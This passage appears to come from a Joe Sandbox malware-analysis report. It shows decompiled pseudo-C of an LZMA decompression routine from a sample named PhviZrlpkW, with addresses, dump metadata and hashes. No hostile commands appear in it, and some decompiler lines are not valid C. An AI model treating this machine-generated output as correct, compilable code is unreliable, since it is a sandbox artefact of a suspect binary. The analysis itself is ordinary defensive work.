                    								_t393 = __ebp - 0x2c;
                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                    								__eflags =  *_t393;
                    								L120:
                    								__eax =  *(__ebp - 0x2c);
                    								__eflags = __eax;
                    								if(__eax == 0) {
                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    									goto L170;
                    								}
                    								__eflags = __eax -  *(__ebp - 0x60);
                    								if(__eax >  *(__ebp - 0x60)) {
                    									goto L171;
                    								}
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    								__eax =  *(__ebp - 0x30);
                    								_t400 = __ebp - 0x60;
                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    								__eflags =  *_t400;
                    								goto L123;
                    							}
                    							__ecx = __ebx;
                    							__eax = __ebx;
                    							__ecx = __ebx >> 1;
                    							__eax = __ebx & 0x00000001;
                    							__ecx = (__ebx >> 1) - 1;
                    							__al = __al | 0x00000002;
                    							__eax = (__ebx & 0x00000001) << __cl;
                    							__eflags = __ebx - 0xe;
                    							 *(__ebp - 0x2c) = __eax;
                    							if(__ebx >= 0xe) {
                    								__ebx = 0;
                    								 *(__ebp - 0x48) = __ecx;
                    								L102:
                    								__eflags =  *(__ebp - 0x48);
                    								if( *(__ebp - 0x48) <= 0) {
                    									__eax = __eax + __ebx;
                    									 *(__ebp - 0x40) = 4;
                    									 *(__ebp - 0x2c) = __eax;
                    									__eax =  *(__ebp - 4);
                    									__eax =  *(__ebp - 4) + 0x644;
                    									__eflags = __eax;
                    									L108:
                    									__ebx = 0;
                    									 *(__ebp - 0x58) = __eax;
                    									 *(__ebp - 0x50) = 1;
                    									 *(__ebp - 0x44) = 0;
                    									 *(__ebp - 0x48) = 0;
                    									L112:
                    									__eax =  *(__ebp - 0x40);
                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    										_t391 = __ebp - 0x2c;
                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    										__eflags =  *_t391;
                    										goto L119;
                    									}
                    									__eax =  *(__ebp - 0x50);
                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    									__eax =  *(__ebp - 0x58);
                    									__esi = __edi + __eax;
                    									 *(__ebp - 0x54) = __esi;
                    									__ax =  *__esi;
                    									__ecx = __ax & 0x0000ffff;
                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    									__eflags =  *(__ebp - 0xc) - __edx;
                    									if( *(__ebp - 0xc) >= __edx) {
                    										__ecx = 0;
                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    										__ecx = 1;
                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    										__ebx = 1;
                    										__ecx =  *(__ebp - 0x48);
                    										__ebx = 1 << __cl;
                    										__ecx = 1 << __cl;
                    										__ebx =  *(__ebp - 0x44);
                    										__ebx =  *(__ebp - 0x44) | __ecx;
                    										__cx = __ax;
                    										__cx = __ax >> 5;
                    										__eax = __eax - __ecx;
                    										__edi = __edi + 1;
                    										__eflags = __edi;
                    										 *(__ebp - 0x44) = __ebx;
                    										 *__esi = __ax;
                    										 *(__ebp - 0x50) = __edi;
                    									} else {
                    										 *(__ebp - 0x10) = __edx;
                    										0x800 = 0x800 - __ecx;
                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    										 *__esi = __dx;
                    									}
                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                    									if( *(__ebp - 0x10) >= 0x1000000) {
                    										L111:
                    										_t368 = __ebp - 0x48;
                    										 *_t368 =  *(__ebp - 0x48) + 1;
                    										__eflags =  *_t368;
                    										goto L112;
                    									} else {
                    										goto L109;
                    									}
                    								}
                    								__ecx =  *(__ebp - 0xc);
                    								__ebx = __ebx + __ebx;
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    								 *(__ebp - 0x44) = __ebx;
                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    									__ecx =  *(__ebp - 0x10);
                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    									__ebx = __ebx | 0x00000001;
                    									__eflags = __ebx;
                    									 *(__ebp - 0x44) = __ebx;
                    								}
                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                    								if( *(__ebp - 0x10) >= 0x1000000) {
                    									L101:
                    									_t338 = __ebp - 0x48;
                    									 *_t338 =  *(__ebp - 0x48) - 1;
                    									__eflags =  *_t338;
                    									goto L102;
                    								} else {
                    									goto L99;
                    								}
                    							}
                    							__edx =  *(__ebp - 4);
                    							__eax = __eax - __ebx;
                    							 *(__ebp - 0x40) = __ecx;
                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    							goto L108;
                    						case 0x1a:
                    							L56:
                    							__eflags =  *(__ebp - 0x64);
                    							if( *(__ebp - 0x64) == 0) {
                    								 *(__ebp - 0x88) = 0x1a;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x68);
                    							__al =  *(__ebp - 0x5c);
                    							__edx =  *(__ebp - 8);
                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    							 *( *(__ebp - 0x68)) = __al;
                    							__ecx =  *(__ebp - 0x14);
                    							 *(__ecx +  *(__ebp - 8)) = __al;
                    							__eax = __ecx + 1;
                    							__edx = 0;
                    							_t192 = __eax %  *(__ebp - 0x74);
                    							__eax = __eax /  *(__ebp - 0x74);
                    							__edx = _t192;
                    							goto L79;
                    						case 0x1b:
                    							goto L75;
                    						case 0x1c:
                    							while(1) {
                    								L123:
                    								__eflags =  *(__ebp - 0x64);
                    								if( *(__ebp - 0x64) == 0) {
                    									break;
                    								}
                    								__eax =  *(__ebp - 0x14);
                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    								__eflags = __eax -  *(__ebp - 0x74);
                    								if(__eax >=  *(__ebp - 0x74)) {
                    									__eax = __eax +  *(__ebp - 0x74);
                    									__eflags = __eax;
                    								}
                    								__edx =  *(__ebp - 8);
                    								__cl =  *(__eax + __edx);
                    								__eax =  *(__ebp - 0x14);
                    								 *(__ebp - 0x5c) = __cl;
                    								 *(__eax + __edx) = __cl;
                    								__eax = __eax + 1;
                    								__edx = 0;
                    								_t414 = __eax %  *(__ebp - 0x74);
                    								__eax = __eax /  *(__ebp - 0x74);
                    								__edx = _t414;
                    								__eax =  *(__ebp - 0x68);
                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    								__eflags =  *(__ebp - 0x30);
                    								 *( *(__ebp - 0x68)) = __cl;
                    								 *(__ebp - 0x14) = _t414;
                    								if( *(__ebp - 0x30) > 0) {
                    									continue;
                    								} else {
                    									goto L80;
                    								}
                    							}
                    							 *(__ebp - 0x88) = 0x1c;
                    							goto L170;
                    					}
                    				}
                    			}













                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x00000000
                    0x00407390
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00406BB0(void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				unsigned int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int _v80;
                    				signed int _v84;
                    				signed int _v88;
                    				signed int _v92;
                    				signed int _v95;
                    				signed int _v96;
                    				signed int _v100;
                    				signed int _v104;
                    				signed int _v108;
                    				signed int _v112;
                    				signed int _v116;
                    				signed int _v120;
                    				intOrPtr _v124;
                    				signed int _v128;
                    				signed int _v132;
                    				signed int _v136;
                    				void _v140;
                    				void* _v148;
                    				signed int _t537;
                    				signed int _t538;
                    				signed int _t572;
                    
                    				_t572 = 0x22;
                    				_v148 = __ecx;
                    				memcpy( &_v140, __ecx, _t572 << 2);
                    				if(_v52 == 0xffffffff) {
                    					return 1;
                    				}
                    				while(1) {
                    					L3:
                    					_t537 = _v140;
                    					if(_t537 > 0x1c) {
                    						break;
                    					}
                    					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                    						case 0:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								goto L173;
                    							}
                    							_v112 = _v112 - 1;
                    							_v116 = _v116 + 1;
                    							_t537 =  *_v116;
                    							__eflags = _t537 - 0xe1;
                    							if(_t537 > 0xe1) {
                    								goto L174;
                    							}
                    							_t542 = _t537 & 0x000000ff;
                    							_push(0x2d);
                    							asm("cdq");
                    							_pop(_t576);
                    							_push(9);
                    							_pop(_t577);
                    							_t622 = _t542 / _t576;
                    							_t544 = _t542 % _t576 & 0x000000ff;
                    							asm("cdq");
                    							_t617 = _t544 % _t577 & 0x000000ff;
                    							_v64 = _t617;
                    							_v32 = (1 << _t622) - 1;
                    							_v28 = (1 << _t544 / _t577) - 1;
                    							_t625 = (0x300 << _t617 + _t622) + 0x736;
                    							__eflags = 0x600 - _v124;
                    							if(0x600 == _v124) {
                    								L12:
                    								__eflags = _t625;
                    								if(_t625 == 0) {
                    									L14:
                    									_v76 = _v76 & 0x00000000;
                    									_v68 = _v68 & 0x00000000;
                    									goto L17;
                    								} else {
                    									goto L13;
                    								}
                    								do {
                    									L13:
                    									_t625 = _t625 - 1;
                    									__eflags = _t625;
                    									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                    								} while (_t625 != 0);
                    								goto L14;
                    							}
                    							__eflags = _v8;
                    							if(_v8 != 0) {
                    								GlobalFree(_v8);
                    							}
                    							_t537 = GlobalAlloc(0x40, 0x600); // executed
                    							__eflags = _t537;
                    							_v8 = _t537;
                    							if(_t537 == 0) {
                    								goto L174;
                    							} else {
                    								_v124 = 0x600;
                    								goto L12;
                    							}
                    						case 1:
                    							L15:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 1;
                    								goto L173;
                    							}
                    							_v112 = _v112 - 1;
                    							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                    							_v116 = _v116 + 1;
                    							_t50 =  &_v76;
                    							 *_t50 = _v76 + 1;
                    							__eflags =  *_t50;
                    							L17:
                    							__eflags = _v76 - 4;
                    							if(_v76 < 4) {
                    								goto L15;
                    							}
                    							_t550 = _v68;
                    							__eflags = _t550 - _v120;
                    							if(_t550 == _v120) {
                    								L22:
                    								_v76 = 5;
                    								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                    								goto L25;
                    							}
                    							__eflags = _v12;
                    							_v120 = _t550;
                    							if(_v12 != 0) {
                    								GlobalFree(_v12);
                    							}
                    							_t537 = GlobalAlloc(0x40, _v68); // executed
                    							__eflags = _t537;
                    							_v12 = _t537;
                    							if(_t537 == 0) {
                    								goto L174;
                    							} else {
                    								goto L22;
                    							}
                    						case 2:
                    							L26:
                    							_t557 = _v100 & _v32;
                    							_v136 = 6;
                    							_v80 = _t557;
                    							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                    							goto L135;
                    						case 3:
                    							L23:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 3;
                    								goto L173;
                    							}
                    							_v112 = _v112 - 1;
                    							_t72 =  &_v116;
                    							 *_t72 = _v116 + 1;
                    							__eflags =  *_t72;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L25:
                    							_v76 = _v76 - 1;
                    							__eflags = _v76;
                    							if(_v76 != 0) {
                    								goto L23;
                    							}
                    							goto L26;
                    						case 4:
                    							L136:
                    							_t559 =  *_t626;
                    							_t610 = _t559 & 0x0000ffff;
                    							_t591 = (_v20 >> 0xb) * _t610;
                    							__eflags = _v16 - _t591;
                    							if(_v16 >= _t591) {
                    								_v20 = _v20 - _t591;
                    								_v16 = _v16 - _t591;
                    								_v68 = 1;
                    								_t560 = _t559 - (_t559 >> 5);
                    								__eflags = _t560;
                    								 *_t626 = _t560;
                    							} else {
                    								_v20 = _t591;
                    								_v68 = _v68 & 0x00000000;
                    								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							if(_v20 >= 0x1000000) {
                    								goto L142;
                    							} else {
                    								goto L140;
                    							}
                    						case 5:
                    							L140:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 5;
                    								goto L173;
                    							}
                    							_v20 = _v20 << 8;
                    							_v112 = _v112 - 1;
                    							_t464 =  &_v116;
                    							 *_t464 = _v116 + 1;
                    							__eflags =  *_t464;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L142:
                    							_t561 = _v136;
                    							goto L143;
                    						case 6:
                    							__edx = 0;
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v8;
                    								__ecx = _v60;
                    								_v56 = 1;
                    								_v136 = 7;
                    								__esi = _v8 + 0x180 + _v60 * 2;
                    								goto L135;
                    							}
                    							__eax = _v96 & 0x000000ff;
                    							__esi = _v100;
                    							__cl = 8;
                    							__cl = 8 - _v64;
                    							__esi = _v100 & _v28;
                    							__eax = (_v96 & 0x000000ff) >> 8;
                    							__ecx = _v64;
                    							__esi = (_v100 & _v28) << 8;
                    							__ecx = _v8;
                    							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                    							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                    							__eflags = _v60 - 4;
                    							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                    							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                    							if(_v60 >= 4) {
                    								__eflags = _v60 - 0xa;
                    								if(_v60 >= 0xa) {
                    									_t103 =  &_v60;
                    									 *_t103 = _v60 - 6;
                    									__eflags =  *_t103;
                    								} else {
                    									_v60 = _v60 - 3;
                    								}
                    							} else {
                    								_v60 = 0;
                    							}
                    							__eflags = _v56 - __edx;
                    							if(_v56 == __edx) {
                    								__ebx = 0;
                    								__ebx = 1;
                    								goto L63;
                    							}
                    							__eax = _v24;
                    							__eax = _v24 - _v48;
                    							__eflags = __eax - _v120;
                    							if(__eax >= _v120) {
                    								__eax = __eax + _v120;
                    								__eflags = __eax;
                    							}
                    							__ecx = _v12;
                    							__ebx = 0;
                    							__ebx = 1;
                    							__al =  *((intOrPtr*)(__eax + __ecx));
                    							_v95 =  *((intOrPtr*)(__eax + __ecx));
                    							goto L43;
                    						case 7:
                    							__eflags = _v68 - 1;
                    							if(_v68 != 1) {
                    								__eax = _v40;
                    								_v132 = 0x16;
                    								_v36 = _v40;
                    								__eax = _v44;
                    								_v40 = _v44;
                    								__eax = _v48;
                    								_v44 = _v48;
                    								__eax = 0;
                    								__eflags = _v60 - 7;
                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    								__al = __al & 0x000000fd;
                    								__eax = (__eflags >= 0) - 1 + 0xa;
                    								_v60 = (__eflags >= 0) - 1 + 0xa;
                    								__eax = _v8;
                    								__eax = _v8 + 0x664;
                    								__eflags = __eax;
                    								_v92 = __eax;
                    								goto L71;
                    							}
                    							__eax = _v8;
                    							__ecx = _v60;
                    							_v136 = 8;
                    							__esi = _v8 + 0x198 + _v60 * 2;
                    							goto L135;
                    						case 8:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v8;
                    								__ecx = _v60;
                    								_v136 = 0xa;
                    								__esi = _v8 + 0x1b0 + _v60 * 2;
                    							} else {
                    								__eax = _v60;
                    								__ecx = _v8;
                    								__eax = _v60 + 0xf;
                    								_v136 = 9;
                    								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                    								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                    							}
                    							goto L135;
                    						case 9:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								goto L92;
                    							}
                    							__eflags = _v100;
                    							if(_v100 == 0) {
                    								goto L174;
                    							}
                    							__eax = 0;
                    							__eflags = _v60 - 7;
                    							_t264 = _v60 - 7 >= 0;
                    							__eflags = _t264;
                    							0 | _t264 = _t264 + _t264 + 9;
                    							_v60 = _t264 + _t264 + 9;
                    							goto L78;
                    						case 0xa:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v8;
                    								__ecx = _v60;
                    								_v136 = 0xb;
                    								__esi = _v8 + 0x1c8 + _v60 * 2;
                    								goto L135;
                    							}
                    							__eax = _v44;
                    							goto L91;
                    						case 0xb:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__ecx = _v40;
                    								__eax = _v36;
                    								_v36 = _v40;
                    							} else {
                    								__eax = _v40;
                    							}
                    							__ecx = _v44;
                    							_v40 = _v44;
                    							L91:
                    							__ecx = _v48;
                    							_v48 = __eax;
                    							_v44 = _v48;
                    							L92:
                    							__eax = _v8;
                    							_v132 = 0x15;
                    							__eax = _v8 + 0xa68;
                    							_v92 = _v8 + 0xa68;
                    							goto L71;
                    						case 0xc:
                    							L102:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xc;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t340 =  &_v116;
                    							 *_t340 = _v116 + 1;
                    							__eflags =  *_t340;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							__eax = _v48;
                    							goto L104;
                    						case 0xd:
                    							L39:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xd;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t127 =  &_v116;
                    							 *_t127 = _v116 + 1;
                    							__eflags =  *_t127;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L41:
                    							__eax = _v68;
                    							__eflags = _v76 - _v68;
                    							if(_v76 != _v68) {
                    								goto L50;
                    							}
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								goto L56;
                    							}
                    							L43:
                    							__eax = _v95 & 0x000000ff;
                    							_v95 = _v95 << 1;
                    							__ecx = _v92;
                    							__eax = (_v95 & 0x000000ff) >> 7;
                    							_v76 = __eax;
                    							__eax = __eax + 1;
                    							__eax = __eax << 8;
                    							__eax = __eax + __ebx;
                    							__esi = _v92 + __eax * 2;
                    							_v20 = _v20 >> 0xb;
                    							__ax =  *__esi;
                    							_v88 = __esi;
                    							__edx = __ax & 0x0000ffff;
                    							__ecx = (_v20 >> 0xb) * __edx;
                    							__eflags = _v16 - __ecx;
                    							if(_v16 >= __ecx) {
                    								_v20 = _v20 - __ecx;
                    								_v16 = _v16 - __ecx;
                    								__cx = __ax;
                    								_v68 = 1;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								__ebx = __ebx + __ebx + 1;
                    								 *__esi = __ax;
                    							} else {
                    								_v68 = _v68 & 0x00000000;
                    								_v20 = __ecx;
                    								0x800 = 0x800 - __edx;
                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							_v72 = __ebx;
                    							if(_v20 >= 0x1000000) {
                    								goto L41;
                    							} else {
                    								goto L39;
                    							}
                    						case 0xe:
                    							L48:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xe;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t161 =  &_v116;
                    							 *_t161 = _v116 + 1;
                    							__eflags =  *_t161;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							while(1) {
                    								L50:
                    								__eflags = __ebx - 0x100;
                    								if(__ebx >= 0x100) {
                    									break;
                    								}
                    								__eax = _v92;
                    								__edx = __ebx + __ebx;
                    								__ecx = _v20;
                    								__esi = __edx + __eax;
                    								__ecx = _v20 >> 0xb;
                    								__ax =  *__esi;
                    								_v88 = __esi;
                    								__edi = __ax & 0x0000ffff;
                    								__ecx = (_v20 >> 0xb) * __edi;
                    								__eflags = _v16 - __ecx;
                    								if(_v16 >= __ecx) {
                    									_v20 = _v20 - __ecx;
                    									_v16 = _v16 - __ecx;
                    									__cx = __ax;
                    									_t175 = __edx + 1; // 0x1
                    									__ebx = _t175;
                    									__cx = __ax >> 5;
                    									__eflags = __eax;
                    									 *__esi = __ax;
                    								} else {
                    									_v20 = __ecx;
                    									0x800 = 0x800 - __edi;
                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    									__ebx = __ebx + __ebx;
                    									 *__esi = __cx;
                    								}
                    								__eflags = _v20 - 0x1000000;
                    								_v72 = __ebx;
                    								if(_v20 >= 0x1000000) {
                    									continue;
                    								} else {
                    									goto L48;
                    								}
                    							}
                    							L56:
                    							_t178 =  &_v56;
                    							 *_t178 = _v56 & 0x00000000;
                    							__eflags =  *_t178;
                    							goto L57;
                    						case 0xf:
                    							L60:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0xf;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t208 =  &_v116;
                    							 *_t208 = _v116 + 1;
                    							__eflags =  *_t208;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L62:
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								L57:
                    								__al = _v72;
                    								_v96 = _v72;
                    								goto L58;
                    							}
                    							L63:
                    							__eax = _v92;
                    							__edx = __ebx + __ebx;
                    							__ecx = _v20;
                    							__esi = __edx + __eax;
                    							__ecx = _v20 >> 0xb;
                    							__ax =  *__esi;
                    							_v88 = __esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = (_v20 >> 0xb) * __edi;
                    							__eflags = _v16 - __ecx;
                    							if(_v16 >= __ecx) {
                    								_v20 = _v20 - __ecx;
                    								_v16 = _v16 - __ecx;
                    								__cx = __ax;
                    								_t222 = __edx + 1; // 0x1
                    								__ebx = _t222;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								 *__esi = __ax;
                    							} else {
                    								_v20 = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							_v72 = __ebx;
                    							if(_v20 >= 0x1000000) {
                    								goto L62;
                    							} else {
                    								goto L60;
                    							}
                    						case 0x10:
                    							L112:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0x10;
                    								goto L173;
                    							}
                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t371 =  &_v116;
                    							 *_t371 = _v116 + 1;
                    							__eflags =  *_t371;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							goto L114;
                    						case 0x11:
                    							L71:
                    							__esi = _v92;
                    							_v136 = 0x12;
                    							goto L135;
                    						case 0x12:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v92;
                    								_v136 = 0x13;
                    								__esi = _v92 + 2;
                    								L135:
                    								_v88 = _t626;
                    								goto L136;
                    							}
                    							__eax = _v80;
                    							_v52 = _v52 & 0x00000000;
                    							__ecx = _v92;
                    							__eax = _v80 << 4;
                    							__eflags = __eax;
                    							__eax = _v92 + __eax + 4;
                    							goto L133;
                    						case 0x13:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								_t475 =  &_v92;
                    								 *_t475 = _v92 + 0x204;
                    								__eflags =  *_t475;
                    								_v52 = 0x10;
                    								_v68 = 8;
                    								L147:
                    								_v128 = 0x14;
                    								goto L148;
                    							}
                    							__eax = _v80;
                    							__ecx = _v92;
                    							__eax = _v80 << 4;
                    							_v52 = 8;
                    							__eax = _v92 + (_v80 << 4) + 0x104;
                    							L133:
                    							_v92 = __eax;
                    							_v68 = 3;
                    							goto L147;
                    						case 0x14:
                    							_v52 = _v52 + __ebx;
                    							__eax = _v132;
                    							goto L143;
                    						case 0x15:
                    							__eax = 0;
                    							__eflags = _v60 - 7;
                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    							__al = __al & 0x000000fd;
                    							__eax = (__eflags >= 0) - 1 + 0xb;
                    							_v60 = (__eflags >= 0) - 1 + 0xb;
                    							goto L123;
                    						case 0x16:
                    							__eax = _v52;
                    							__eflags = __eax - 4;
                    							if(__eax >= 4) {
                    								_push(3);
                    								_pop(__eax);
                    							}
                    							__ecx = _v8;
                    							_v68 = 6;
                    							__eax = __eax << 7;
                    							_v128 = 0x19;
                    							_v92 = __eax;
                    							goto L148;
                    						case 0x17:
                    							L148:
                    							__eax = _v68;
                    							_v84 = 1;
                    							_v76 = _v68;
                    							goto L152;
                    						case 0x18:
                    							L149:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 0x18;
                    								goto L173;
                    							}
